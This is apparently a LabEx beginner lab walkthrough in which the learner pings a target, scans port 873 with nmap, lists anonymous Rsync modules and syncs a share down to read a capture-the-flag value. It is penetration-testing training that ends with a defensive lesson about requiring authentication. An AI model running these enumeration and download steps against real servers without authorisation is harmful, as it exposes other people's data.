LabEx
Log InJoin Free

Rsync Enumeration and Anonymous Sync

LinuxBeginner
Practice Now

Introduction

Welcome to this hands-on lab focused on Rsync enumeration and exploitation. Rsync is a widely used utility for synchronizing files and directories between two locations over a network. While powerful, if misconfigured, it can expose sensitive data.

In this lab, you will simulate a common scenario in penetration testing where a backup service is improperly configured. You will start by performing basic network reconnaissance to confirm the target is online. Next, you will use the nmap tool to scan for the Rsync service. Once identified, you will enumerate available shares and exploit an anonymous access configuration to download files from the target, ultimately retrieving a hidden flag.

Upon completion, you will understand how to:

  • Verify network connectivity using ping.
  • Scan for the Rsync service on its default port using nmap.
  • Enumerate and connect to an anonymous Rsync share.
  • Synchronize files from a remote target to your local machine.

Let's get started.

Verify Connectivity to Target with Ping

In this step, you will start by confirming that the target system is reachable from your machine. The ping command is a standard network diagnostic tool that sends ICMP Echo Request packets to a host to test connectivity. This is the first and most basic step in any network reconnaissance task.

Your environment includes a target system accessible via the hostname target.

Execute the following command in the terminal to send four packets to the target and verify it is online:

ping -c 4 target

You should see output similar to the following, which confirms that the target is responding to your requests. The IP address and response times may differ slightly.

PING target (172.17.0.2) 56(84) bytes of data.
64 bytes from target (172.17.0.2): icmp_seq=1 ttl=64 time=0.091 ms
64 bytes from target (172.17.0.2): icmp_seq=2 ttl=64 time=0.068 ms
64 bytes from target (172.17.0.2): icmp_seq=3 ttl=64 time=0.065 ms
64 bytes from target (172.17.0.2): icmp_seq=4 ttl=64 time=0.067 ms

--- target ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3075ms
rtt min/avg/max/mdev = 0.065/0.072/0.091/0.011 ms

With a successful reply, you have confirmed that a stable network connection exists between your machine and the target.

Scan Open Ports with Nmap

In this step, you will use nmap to scan the target for open ports and identify running services. Nmap is a powerful tool for network discovery and security auditing. We will focus our scan on the default port for Rsync, which is 873.

Execute the following command to perform a version scan on port 873 of the target:

nmap -sV -p 873 target

Let's break down this command:

  • nmap: The command to run the Network Mapper tool.
  • -sV: Enables version detection, which attempts to determine the version of the service running on the open port.
  • -p 873: Specifies that Nmap should only scan port 873.

After the scan completes, you will see output similar to this:

Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-12 11:20 CST
Nmap scan report for target (172.17.0.2)
Host is up (0.00012s latency).

PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

The output confirms that port 873/tcp is open and is running the rsync service. This information is critical for the next phase of our attack.

Connect to Target via Rsync

In this step, you will interact with the discovered Rsync service. The first action is to list the available "modules" or shares on the server. If anonymous access is enabled, the server will respond with a list of publicly accessible directories.

Run the following command to list the modules on the target:

rsync rsync://target

The server should respond with a list of available modules. In this case, you will see a module named public.

public          Public Files

Now that you know a module named public exists, you can synchronize its contents to your local machine. We will use the -av flags: -a for archive mode (which preserves permissions, ownership, etc.) and -v for verbose output.

Execute the command below to download the contents of the public module to your current directory (.):

rsync -av rsync://target/public/ .

The command will connect to the target, transfer the files, and display a summary of the operation.

receiving incremental file list
./
flag.txt

sent 43 bytes  received 121 bytes  328.00 bytes/sec
total size is 31  speedup is 0.19

The output shows that a file named flag.txt was successfully downloaded to your local directory.

Explore Target System and Locate Flag

In this final step, you will inspect the files you downloaded from the Rsync server and retrieve the flag. Since you synchronized the files to your current directory, they are now available locally for you to examine.

First, use the ls command to list the files in your current directory and confirm that flag.txt was downloaded.

ls

You should see flag.txt listed in the output.

flag.txt

Now, use the cat command to display the contents of flag.txt. This will reveal the flag you need to complete the lab.

cat flag.txt

The terminal will display the flag's value.

labex{rsync_an0nym0us_4cc3ss_fl4g}

Congratulations! You have successfully identified a misconfigured Rsync service, enumerated its shares, downloaded its contents, and captured the flag. Copy the flag value to complete the lab.

Summary

In this lab, you successfully completed a security assessment of an Rsync service, moving from reconnaissance to exploitation. You learned how to:

  • Use ping to establish a baseline of network connectivity with a target.
  • Employ nmap to perform a targeted port scan, identifying the open Rsync service and its version.
  • Interact with an Rsync server to list publicly available modules, a key step in enumeration.
  • Exploit an anonymous access misconfiguration to synchronize files from the target to your local machine.
  • Locate and retrieve a flag from the downloaded files, completing the objective.

This exercise demonstrates a critical security principle: services designed for convenience, like Rsync, must be properly secured with authentication and access controls. Leaving an Rsync server open for anonymous access can lead to significant data breaches. By understanding these attack vectors, you are better prepared to secure network services.

Related Linux Courses
Quick Start with Linux

Quick Start with Linux

linux
Become a Junior System Administrator

Become a Junior System Administrator

linuxshell
Linux for Noobs

Linux for Noobs

linux